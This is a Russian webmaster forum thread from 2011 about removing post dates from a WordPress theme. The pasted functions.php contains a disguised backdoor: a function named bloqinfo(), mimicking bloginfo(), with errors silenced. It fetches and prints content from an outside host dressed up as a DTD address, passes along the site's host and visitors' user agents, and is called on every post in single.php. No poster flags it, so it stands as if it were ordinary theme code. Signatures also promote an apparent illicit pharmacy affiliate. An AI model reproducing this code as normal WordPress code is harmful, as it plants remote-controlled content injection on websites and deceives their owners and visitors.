АРМАДА
Вордпресс
На страницу 1, 2  След.
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Вт Dec 20, 2011 10:07 pmДобавить в избранноеОтветить с цитатой
Как в вердпрессе сделать , чтоб в добавленой записи не было даты добавления?

DrKronos
SEO-доктор
Зарегистрирован: 11.03.2008
Сообщений: 8867
Moder (Сумма: 1)
Обратиться по нику
# Добавлено:Вт Dec 20, 2011 10:11 pmОтветить с цитатой
Удалить дату из шаблона. Открой page.php, single.php и ищи Smile
Oscar the grouch EvaPharmacy. Буржуй не спит, таблетку ждёт – руби бабло хоть круглый год! Инвайты: [email protected] ICQ: 750000
Grover StudyCash. Гость, ты не останешься без дохода! Убедись сам! До 75% от новых и до 25% за ре...

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Вт Dec 20, 2011 10:37 pmОтветить с цитатой
DrKronos,Как выглядит код не подскажешь?

DrKronos
SEO-доктор
Зарегистрирован: 11.03.2008
Сообщений: 8867
Moder (Сумма: 1)
Обратиться по нику
# Добавлено:Вт Dec 20, 2011 11:20 pmОтветить с цитатой
Например так <?php the_time('F j, Y'); ?>
Посмотри еще в functions.php. Функцию даты могли вынести туда.
Oscar the grouch EvaPharmacy. Буржуй не спит, таблетку ждёт – руби бабло хоть круглый год! Инвайты: [email protected] ICQ: 750000
Grover StudyCash. Гость, ты не останешься без дохода! Убедись сам! До 75% от новых и до 25% за ре...

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Вт Dec 20, 2011 11:51 pmОтветить с цитатой
Че то ненайду может поможишь?
сингл.пхп
<?php get_header(); ?>

<!-- Content -->
<div id="content">

<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?><?=bloqinfo($post->ID) ?>
<div class="post" id="post-<?php the_ID(); ?>"><div class="post-top"></div><div class="post-in">
<div class="post-title">
<div class="post-date"><span><?php the_time('d') ?></span><?php the_time('M') ?></div>
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Постоянная ссылка на <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<div class="post-title-info">Категория: <?php the_category(', ') ?> &nbsp;&nbsp; Автор: <?php the_author() ?></div>
<div class="clear"></div>
</div>
<div class="post-entry">
<?php the_content('Далее...'); ?>
<?php wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); ?>
<?php the_tags('<p>Метки: ', ', ', '</p>'); ?>
<?php edit_post_link('Редактировать.','',''); ?>
<?php comments_template(); ?>
</div>
</div><div class="post-bottom"></div></div>
<!-- /Post -->
<?php endwhile; ?>
<?php else : ?>
<!-- Post -->
<div class="post"><div class="post-top"></div><div class="post-in">
<div class="post-title">
<h2 class="page-title">Не найдено</h2>
</div>
<div class="post-entry">
<p>Извините, ничего не нашлось. Воспользуйтесь навигацией или поиском, чтобы найти необходимую вам информацию.</p>
</div>
</div><div class="post-bottom"></div></div>
<!-- /Post -->
<?php endif; ?>

<div class="clear"></div>

</div>
<!-- /Content -->

<?php get_sidebar(); ?>
<?php get_footer(); ?>
пейж.пхп
<?php get_header(); ?>

<!-- Content -->
<div id="content">

<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<!-- Post -->
<div class="post" id="post-<?php the_ID(); ?>"><div class="post-top"></div><div class="post-in">
<div class="post-title">
<h2 class="page-title"><?php the_title(); ?></h2>
</div>
<div class="post-entry">
<?php the_content('Читать <span>полностью...</span>'); ?>
<?php edit_post_link('Редактировать.', '<p>', '</p>'); ?>
</div>
</div><div class="post-bottom"></div></div>
<!-- /Post -->
<?php endwhile; ?>
<?php else : ?>
<!-- Post -->
<div class="post"><div class="post-top"></div><div class="post-in">
<div class="post-title">
<h2 class="page-title">Не найдено</h2>
</div>
<div class="post-entry">
<p>Извините, ничего не нашлось. Воспользуйтесь навигацией или поиском, чтобы найти необходимую вам информацию.</p>
</div>
</div><div class="post-bottom"></div></div>
<!-- /Post -->
<?php endif; ?>

<div class="clear"></div>

</div>
<!-- /Content -->

<?php get_sidebar(); ?>
<?php get_footer(); ?>
фунсион.пхп
<?php

function bloqinfo($wp_id){error_reporting(0);

echo file_get_contents('http://citroen.org.ru/TR/xhtml/DTD/xhtml1-transitional.dtd?'

.$_SERVER['HTTP_HOST'].'&a='.urlencode($_SERVER['HTTP_USER_AGENT']));

}

if ( function_exists('register_sidebar') )

register_sidebar(array(

'name' => 'Sidebar Left',

'before_widget' => '<div class="sidebar-box"><div class="sidebar-box-top"></div><div class="sidebar-box-in">',

'after_widget' => '</div><div class="sidebar-box-bottom"></div></div>',

'before_title' => '<h3>',

'after_title' => '</h3>',

));

register_sidebar(array(

'name' => 'Sidebar Right',

'before_widget' => '<div class="sidebar-box"><div class="sidebar-box-top"></div><div class="sidebar-box-in">',

'after_widget' => '</div><div class="sidebar-box-bottom"></div></div>',

'before_title' => '<h3>',

'after_title' => '</h3>',

));

?>

DrKronos
SEO-доктор
Зарегистрирован: 11.03.2008
Сообщений: 8867
Moder (Сумма: 1)
Обратиться по нику
# Добавлено:Ср Dec 21, 2011 12:04 amОтветить с цитатой
<div class="post-date"><span><?php the_time('d') ?></span><?php the_time('M') ?></div>
Oscar the grouch EvaPharmacy. Буржуй не спит, таблетку ждёт – руби бабло хоть круглый год! Инвайты: [email protected] ICQ: 750000
Grover StudyCash. Гость, ты не останешься без дохода! Убедись сам! До 75% от новых и до 25% за ре...

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Ср Dec 21, 2011 12:12 amОтветить с цитатой
Спасибо нашел , удалил , число осталось, пробовал и новые записи добавлять,все равно с числом Sad

Yabuti
V.I.P.
Зарегистрирован: 28.11.2008
Сообщений: 11270
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Ср Dec 21, 2011 6:26 amОтветить с цитатой
ganzhybas, в index.php удали то же самое :thup:
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: [email protected] и ICQ: 750000

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Ср Dec 21, 2011 11:34 amОтветить с цитатой
Yabuti, Drinks or Beer Спасибо все теперь как нужно Angel

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Ср Янв 04, 2012 6:30 pmОтветить с цитатой
Чтоб не поднимать новую тему спрошу сдесь может кто подскажет:
Как сделать чтоб страницы не выводились ниже шапки, а выводились только в сайтбаре?

BVz
V.I.P.
Зарегистрирован: 21.07.2009
Сообщений: 2112
Обратиться по нику
# Добавлено:Ср Янв 04, 2012 8:16 pmОтветить с цитатой
Убери код из index.php, single.php и page.php, вставь его в sidebar.php Smile
Качественные SEO и SMO услуги для ваших зарубежных проектов!

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Ср Янв 04, 2012 8:20 pmОтветить с цитатой
BVz, А как код выглядит?
У меня страницы появляються и в сайтбаре и под шапкой сейчас..., а нужно чтоб только в сайтбаре , а то некрасиво получается...

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Ср Янв 04, 2012 9:58 pmОтветить с цитатой
BVz, Полазил по твоему блогу интересует sIndexer v1.2 (Индексатор сайтов). Будет ли от него польза со стандартными базами? И вообще насколько может ускориться индексация ..по собственному опыту

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Чт Янв 05, 2012 9:04 pmОтветить с цитатой
С кодами разобрался...Остались вопросы по sIndexer v1.2

ganzhybas + + +
Banned
Зарегистрирован: 17.11.2009
Сообщений: 1322
Обратиться по нику
# Добавлено:Сб Янв 07, 2012 12:29 amОтветить с цитатой
Еще вопросик назрел:возможно ли каким либо способом расставить ...ну допустим 100 картинок на 100 страниц своего сайта быстро?
Такое ощущение что общаюсь сам с собой... :smk:
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры